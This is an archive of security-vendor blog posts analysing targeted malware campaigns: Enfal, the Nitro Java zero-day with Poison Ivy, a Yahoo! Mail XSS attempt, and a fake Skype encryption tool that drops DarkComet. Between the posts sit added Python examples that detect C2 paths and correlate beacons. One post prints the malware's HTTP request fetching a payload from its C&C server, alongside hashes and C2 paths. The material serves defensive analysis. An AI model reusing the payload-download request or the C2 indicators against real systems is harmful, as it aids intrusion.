    Author Archive - Nart Villeneuve (Senior Threat Researcher)

    The term “Watering Hole” has become a popular way to describe targeted malware attacks in which the attackers compromise a legitimate website and insert a “drive-by” exploit in order to compromise the website’s visitors. Two recent papers by our friends at RSA and Symantec documented such attacks.

    Of course, such attacks are not new. This technique has long been used by indiscriminate cybercriminal attacks as well as targeted malware attacks. I documented the use of such techniques in 2009 and 2010 and there have been more recent cases as well.

    While cybercriminals use “drive-by” exploits to indiscriminately compromise as many computers as they can, the use of this technique in relation to APT activity is what Shadowserver aptly described as “strategic web compromises”. The objective is to selectively target visitors interested in specific content. Such attacks often emerge in conjunction with a new drive-by exploit.

    Posted in Malware | Watering Holes and Zero-Day Attacks

    Modified versions of the Enfal malware, which figured prominently in the LURID attacks, were seen to have infected more than 800 systems worldwide. Enfal variants are known to communicate with specific servers that give the attackers access to, and even full control of, infected systems.

    We recently uncovered several attacks that used a modified version of Enfal, which has compromised 874 systems in 33 countries. Enfal was the malware used in the LURID targeted attacks, which we documented in September 2011. The malware has also been linked to attacks going back to 2006 and possibly even 2002.

    We investigated five command-and-control (C&C) servers related to these attacks and found that there were victim concentrations in Vietnam, Russia and Mongolia.

    These identified targeted victims can be categorized as:

    • Government Ministries and Agencies
    • Military and Defense contractors
    • Nuclear and Energy sectors
    • Space and Aviation
    • Tibetan community

    Here are the top 5 countries that had compromised computers connecting to the five C&C servers. Note that a single compromised system may connect to more than one server.

    C&C (1) {BLOCKED}2.152.14
    • Vietnam 394
    • Russia 34
    • India 19
    • China 14
    • Bangladesh 11

    C&C (2) {BLOCKED}2.153.79
    • Russia 85
    • Mongolia 65
    • Kazakhstan 32
    • United States 19
    • India 14

    C&C (3) {BLOCKED}8.175.122
    • Mongolia 41
    • Russia 14
    • China 11
    • Philippines 6
    • India 5

    C&C (4) {BLOCKED}3.76.90
    • Mongolia 42
    • Russia 25
    • Philippines 5
    • China 4
    • Brazil 2

    C&C (5) {BLOCKED}2.154.203
    • Russia 36
    • Kazakhstan 2
    • Pakistan 1

    It should be noted, however, that in many cases we were unable to identify a specific victim beyond ISP and country. We are continuously notifying compromised parties via appropriate channels.

    Attacks Using Modified Enfal With Campaign “Tags”

    We found that there were 63 campaign “tags” or codes that the attackers used to keep track of which attack compromised which computers. Here are the top 5 campaign tags.

    Campaign tag (count)
    • ynshll 221
    • ynsh 113
    • mgin 89
    • 0821zh 40
    • ym2012814 38

    During our research, we found that the typical attack vector is a socially engineered email carrying a malicious attachment.

    The attachment is the malicious document Special General Meeting.doc (detected as TROJ_ARTIEF.JN), which exploits a Microsoft Office vulnerability (CVE-2012-0158) to drop BKDR_MECIV.AF onto the targeted computer. The compromised computer then begins to communicate with a C&C server, through which the attackers can maintain full control of the computer.

    File name, hash, detection name:
    • Special General Meeting.doc 2f66e1a97b17450445fbbec36de93daf TROJ_ARTIEF.JN
    • datac1en.dll 9801d66d822cb44ea4bf8f4d2739e29c BKDR_MECIV.AF

    The communication of this Enfal variant differs from that of previous ones. The names of the files requested from the C&C server have been changed, and so has the XOR value used to encrypt the communications. In addition, all of the communication is now XORed.

    Previous versions of Enfal have consistently requested “/cg[a-z]-bin/Owpq4.cgi” on the C&C server, which made that path a reliable network indicator.

    In addition, we found malicious documents in Russian that also drop the Enfal malware and connect to this network of C&C servers.

    File name, hash:
    • Замысел Кавказ 2012.doc 81f40945554a4d585ea4993e43a493a5
    • datac1en.dll 7185411935b5c24d600bd17debc2a0a0

    The samples of this Enfal variant, which connect to the URL path /8jwpc/odw3ux, have used a variety of sub-domains on at least five domain names as C&C servers: {BLOCKED}, {BLOCKED}, {BLOCKED}, {BLOCKED} and {BLOCKED}.

    In addition to this Enfal variant, its traditional version remains active as well. However, the modifications made to the traditional Enfal file paths indicate that the attackers are attempting to bypass defense measures such as IDS and network monitoring that match on Enfal’s consistent URL paths.
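The following is an added example, not code from the post or from Trend Micro, showing the detection point made above: a network rule that matches only the legacy “/cg[a-z]-bin/Owpq4.cgi” path misses the modified variant, so the rule set has to carry both paths. The two paths are the ones named in the post; the proxy log format, hostnames and client addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Rule set built from the two request paths named in the post: the regex the
# legacy Enfal variants consistently requested, and the fixed path used by the
# modified variant. Everything else below (log format, hosts, clients) is
# constructed for this example.
ENFAL_RULES = {
    "enfal_legacy_cgi": re.compile(r"^/cg[a-z]-bin/Owpq4\.cgi$"),
    "enfal_modified_path": re.compile(r"^/8jwpc/odw3ux$"),
}

# Constructed proxy log: "<timestamp> <client> <method> <host> <request-target>"
SAMPLE_PROXY_LOG = """\
2012-09-10T08:01:02Z 10.0.0.12 GET intranet.example.local /index.html
2012-09-10T08:01:09Z 10.0.0.12 GET cnc-placeholder-1.example /cgi-bin/Owpq4.cgi
2012-09-10T08:02:15Z 10.0.0.45 GET cnc-placeholder-2.example /8jwpc/odw3ux
2012-09-10T08:03:00Z 10.0.0.77 GET cnc-placeholder-3.example /cgz-bin/Owpq4.cgi
2012-09-10T08:04:30Z 10.0.0.90 GET cnc-placeholder-2.example /8jwpc/odw3ux?id=1
"""


def parse_proxy_line(line):
    """Split one constructed log line into its fields, keeping only the URL path
    (query string dropped) so a rule on the path is not evaded by appending ?x=y."""
    ts, client, method, host, target = line.split(maxsplit=4)
    return {"ts": ts, "client": client, "method": method, "host": host,
            "path": urlsplit(target).path}


def scan_proxy_log(log_text, rules=ENFAL_RULES):
    """Return (client, host, path, rule_name) for every request matching a rule."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_proxy_line(line)
        for name, pattern in rules.items():
            if pattern.match(rec["path"]):
                hits.append((rec["client"], rec["host"], rec["path"], name))
    return hits


def clients_missed_by(log_text, subset_rule_names, rules=ENFAL_RULES):
    """Clients flagged by the full rule set but not by the given subset; shows
    what a sensor that only knows the legacy path would miss."""
    subset = {name: rules[name] for name in subset_rule_names}
    full = {hit[0] for hit in scan_proxy_log(log_text, rules)}
    partial = {hit[0] for hit in scan_proxy_log(log_text, subset)}
    return sorted(full - partial)


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("ALERT", *hit)
    print("missed by legacy-only rule:",
          clients_missed_by(SAMPLE_PROXY_LOG, ["enfal_legacy_cgi"]))
```

Running it flags four requests; restricting the rule set to the legacy path alone leaves the two clients talking to the modified variant unreported, which is exactly the gap the attackers' path change opens.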

    Trend Micro Deep Discovery defends against these attacks using a three-level detection scheme:

    • Malware scan (i.e., signature and heuristic) and Sandbox simulation
    • Destination analysis using the Trend Micro Smart Protection Network
    • Rule-based heuristic analysis of network traffic

    Despite the modifications made to the Enfal malware, Deep Discovery is able to heuristically detect and defend against Enfal attacks.

    Coming Soon: The TrendLabs Security Intelligence Blog will be the new Malware Blog

    Posted in Malware, Targeted Attacks | Modified Enfal Variants Compromised 874 Systems

    The security community has been focused on the new Java zero-day exploits that appear to have been taken from a Chinese exploit pack (known as Gondad or KaiXin) used in targeted attacks by the “Nitro” cyber-espionage campaign and then incorporated into criminal operations using the BlackHole Exploit Kit. While the connections between these developments are starting to emerge, it is important to remember that campaigns, such as Nitro, don’t “come back” because they don’t go away. The Nitro attackers continued to be active after their activities were documented in 2011.

    In fact, before they acquired this Java exploit, the Nitro attackers were continuing to send out emails to their targets with direct links to Poison Ivy executables in early August 2012 (on a related note, another such email was spotted in April 2012).

    The file Flashfxp.exe was hosted on one of the same servers that hosted the Java zero-day and Poison Ivy payload, and it connects to ok.{BLOCKED}, which resolves to the same IP address, {BLOCKED}.{BLOCKED}.233.244. This is the same address as hello.{BLOCKED}, the domain used as the command-and-control server for the Poison Ivy payload dropped by the Java zero-day.

    Despite having at least two staging servers hosting the malicious files for the Java zero-day exploit (and at least three staging servers hosting executables), all the Poison Ivy payloads connect to domains that resolve to the same IP address. Numerous domain names used as Poison Ivy controllers related to the Nitro campaign also resolve to that IP address. While there was some initial skepticism regarding whether or not this Java exploit was used in targeted attacks, there appears to be increasing evidence that it was used by the “Nitro” attackers.
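The reasoning above, several staging servers but every controller domain resolving to one address, is an infrastructure pivot an analyst can automate. The following is an added example, not code from the post or from Trend Micro: given passive-DNS-style observations, it finds the other hostnames sharing an IP with one confirmed controller and flags addresses that many hostnames resolve to. The real names and addresses are redacted in the post, so every hostname here is a placeholder and the IPs are from the RFC 5737 documentation ranges.

```python
from collections import defaultdict

# Constructed passive-DNS-style observations of (hostname, resolved IP). The post
# redacts the real names and addresses, so hostnames are placeholders and the IPs
# come from the RFC 5737 documentation ranges. The layout mirrors the post's
# account: separate staging hosts serving files, many controller domains on one IP.
DNS_OBSERVATIONS = [
    ("hello.placeholder-a.example", "203.0.113.244"),   # C2 of the Poison Ivy payload dropped by the Java zero-day
    ("ok.placeholder-b.example", "203.0.113.244"),      # contacted by Flashfxp.exe
    ("ctrl1.placeholder-c.example", "203.0.113.244"),   # further Poison Ivy controller names
    ("ctrl2.placeholder-d.example", "203.0.113.244"),
    ("stage1.placeholder-e.example", "198.51.100.10"),  # staging server hosting the exploit files
    ("stage2.placeholder-f.example", "198.51.100.11"),  # second staging server
    ("www.unrelated.example", "192.0.2.50"),            # benign noise in the data set
]


def build_ip_index(observations):
    """Map each IP to the set of hostnames observed resolving to it."""
    index = defaultdict(set)
    for host, ip in observations:
        index[ip].add(host)
    return index


def pivot_on_host(seed_host, observations):
    """Every other hostname that shares an IP with seed_host (sorted)."""
    by_ip = build_ip_index(observations)
    related = set()
    for host, ip in observations:
        if host == seed_host:
            related |= by_ip[ip]
    related.discard(seed_host)
    return sorted(related)


def shared_infrastructure(observations, min_hosts=3):
    """IPs that at least min_hosts distinct hostnames resolve to: the pattern the
    post describes, where numerous controller domains sit on one address."""
    by_ip = build_ip_index(observations)
    return sorted(ip for ip, hosts in by_ip.items() if len(hosts) >= min_hosts)


def expand_indicators(seed_host, observations):
    """Grow one confirmed C2 hostname into a block list: its IP(s) plus every
    hostname on them. Shared hosting would make this over-broad, so the result
    is reviewed before it is deployed."""
    by_ip = build_ip_index(observations)
    ips = sorted({ip for host, ip in observations if host == seed_host})
    hosts = set()
    for ip in ips:
        hosts |= by_ip[ip]
    return {"ips": ips, "hosts": sorted(hosts)}


if __name__ == "__main__":
    seed = "hello.placeholder-a.example"
    print("related to", seed, "->", pivot_on_host(seed, DNS_OBSERVATIONS))
    print("shared controller IPs ->", shared_infrastructure(DNS_OBSERVATIONS))
    print("block list ->", expand_indicators(seed, DNS_OBSERVATIONS))
```

Starting from the one controller domain named in the post, the pivot returns the other controller names on the same address, while the two staging hosts stay separate because they resolve elsewhere; the threshold in shared_infrastructure is a tuning knob, since a legitimate shared-hosting IP would also pass it.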

    Trend Micro products detect and remove the exploits and Poison Ivy payload. Deep Discovery™ also detects and blocks communication done by the Poison Ivy payload.

    Update as of August 31, 6:30 PM PDT

    Oracle has released an out-of-band patch for Java which fixes this zero-day exploit. The update increments the version number to Version 7 Update 7 for users on the latest JRE version; users still using Java 6 are also receiving an update that will increment their version to Version 6 Update 35. Users should immediately update their systems to protect against this threat.

    Update as of September 4, 11:10 AM PDT

    Trend Micro Deep Security users should apply the rule 1005178 – Java Applet Remote Code Execution Vulnerability – 2 to protect from threats seen exploiting this Java vulnerability.


    Recently, Trend Micro researchers encountered a potential vulnerability that affected users of Yahoo! Mail. We discovered several emails used in targeted attacks that contained JavaScript in the “From” field that attempted to launch a Document Object Model (DOM)-based cross-site scripting attack against the recipients of the email. However, we were not able to replicate the attack successfully. We have been in touch with Yahoo! about this problem. They, too, were unable to replicate this attack successfully at that time. However, to protect users against any such problems, Yahoo! has strengthened the filters that sanitize user emails in order to protect against these kinds of attacks.

    This is not the first time that vulnerabilities have been found in popular webmail providers. We discussed almost a year ago that some of the major webmail providers – Gmail, Hotmail, and Yahoo! Mail – were all found to have some sort of vulnerability that compromised either the user’s email account or their system. It shouldn’t be a surprise that they’ve become targets as well: just about everyone uses these free services, and users don’t expect these services to have security problems of their own.

    As we’ve highlighted before, vulnerabilities like these are used in targeted attacks. Whether they are in user software or in cloud-based services like free webmail, vulnerabilities allow attackers to compromise systems without the target being aware that anything has happened. This is extremely useful to attackers: the contents of compromised email accounts can be stolen, and the account can be used to launch further attacks against the victim’s contacts.


    As the conflict in Syria persists, the Internet continues to play an interesting role. As we reported in a previous post, there have been targeted attacks against Syrian opposition supporters. With activists’ continued use of social media, it is not surprising to read reports of targeted phishing attempts to steal Facebook and YouTube credentials. A CNN report also revealed that malware was being propagated through Skype, which brings us to another Skype-themed attack that we have uncovered.

    We discovered a webpage that advertises software purporting to provide encryption for Skype. This page is hosted in Syria on {BLOCKED}, which resolves to {BLOCKED}.{BLOCKED}.0.28, the same server that acted as a command-and-control (C&C) server for previous attacks. The webpage features an embedded YouTube video that claims to be from “IT Security Lab” and to encrypt voice communications.

    If users are tricked into downloading the file, a program does appear that is supposed to encrypt users’ Skype data. The said file, Skype Encription v 2.1.exe, is detected by Trend Micro as BKDR_METEO.HVN. During the analysis, we did not find any evidence that the software actually provides any security properties.

    This file contains some interesting strings that suggest it was created by “SyRiAnHaCkErS”:

    Encription v 2.1.pdb

    The software then issues a connection:

    GET /SkypeEncription/Download/skype.exe HTTP/1.1
    Host: {BLOCKED}.{BLOCKED}.0.28
    Connection: Keep-Alive

    The downloaded file skype.exe, detected as BKDR_ZAPCHAST.HVN, is actually DarkComet version 3.3 and connects to {BLOCKED}.{BLOCKED}.0.28 on port 771. We were able to redirect the traffic in our test environment to confirm that it is indeed DarkComet.
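The two observations above, the GET for /SkypeEncription/Download/skype.exe followed by a connection to the same server on port 771, are separate events in a proxy log and a firewall log. The following is an added example, not code from the post or from Trend Micro, that correlates the two so a host that fetched the fake encryption tool and then beaconed within a short window is ranked above a host that only did one of them. The download path and port 771 are from the post; the C&C address is redacted there, so the IP below is a constructed RFC 5737 placeholder, and both logs are constructed.

```python
from datetime import datetime, timedelta

# Indicators from the post: the download path and the port the DarkComet sample
# connects to. The C2 address is redacted on the page, so the IP here is a
# constructed RFC 5737 placeholder; both logs below are constructed as well.
DOWNLOAD_PATH = "/SkypeEncription/Download/skype.exe"
C2_IP = "203.0.113.28"
C2_PORT = 771

# Constructed proxy log: (timestamp, client, method, destination IP, path)
PROXY_LOG = [
    ("2012-09-05T10:00:00", "10.0.0.5", "GET", "203.0.113.28", DOWNLOAD_PATH),
    ("2012-09-05T10:20:00", "10.0.0.9", "GET", "203.0.113.28", DOWNLOAD_PATH),
    ("2012-09-05T10:30:00", "10.0.0.7", "GET", "198.51.100.3", "/index.html"),
]

# Constructed firewall log: (timestamp, client, destination IP, destination port)
CONN_LOG = [
    ("2012-09-05T10:00:12", "10.0.0.5", "203.0.113.28", 771),  # beacon 12 s after the download
    ("2012-09-05T10:00:45", "10.0.0.7", "203.0.113.28", 771),  # beacon with no download in the proxy log
    ("2012-09-05T12:00:00", "10.0.0.9", "203.0.113.28", 771),  # beacon well after the download
    ("2012-09-05T10:01:00", "10.0.0.5", "198.51.100.3", 443),  # unrelated traffic
]


def _ts(text):
    return datetime.fromisoformat(text)


def download_times(proxy_log, path=DOWNLOAD_PATH):
    """Earliest time each client fetched the lure's payload path."""
    first = {}
    for ts, client, _method, _dst, p in proxy_log:
        if p == path:
            t = _ts(ts)
            if client not in first or t < first[client]:
                first[client] = t
    return first


def beacon_times(conn_log, ip=C2_IP, port=C2_PORT):
    """All connection times from each client to the C2 address and port."""
    beacons = {}
    for ts, client, dst, dport in conn_log:
        if dst == ip and dport == port:
            beacons.setdefault(client, []).append(_ts(ts))
    return beacons


def correlate(proxy_log, conn_log, window=timedelta(minutes=30)):
    """Tag each client with 'downloaded', 'beaconed', and 'download_then_beacon'
    when a C2 connection follows the download within the window, which is the
    chain the post describes: fetch skype.exe, then DarkComet calls home."""
    downloads = download_times(proxy_log)
    beacons = beacon_times(conn_log)
    tags = {}
    for client in downloads:
        tags.setdefault(client, set()).add("downloaded")
    for client, times in beacons.items():
        tags.setdefault(client, set()).add("beaconed")
        if client in downloads and any(
                timedelta(0) <= t - downloads[client] <= window for t in times):
            tags[client].add("download_then_beacon")
    return tags


if __name__ == "__main__":
    for client, tags in sorted(correlate(PROXY_LOG, CONN_LOG).items()):
        print(client, sorted(tags))
```

Any connection to the C&C address on port 771 is worth an alert on its own; the correlation only adds the higher-confidence tag for the host whose beacon follows the download, while a beacon hours later, or one with no download in the proxy log, keeps its single tag for an analyst to look at.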

    Once BKDR_ZAPCHAST.HVN is installed, the attackers are able to take full control of the compromised system through the DarkComet RAT. The features of the DarkComet RAT have been covered here and here.

    Note that Skype uses AES encryption on calls and instant messages, as well as its video conversations.

    Trend Micro users need not worry as they are protected from this threat via Trend Micro™ Smart Protection Network™ that detects and deletes the related malware. We are also continuously monitoring this campaign and will update users for any significant developments.



    © Copyright 2013 Trend Micro Inc. All rights reserved.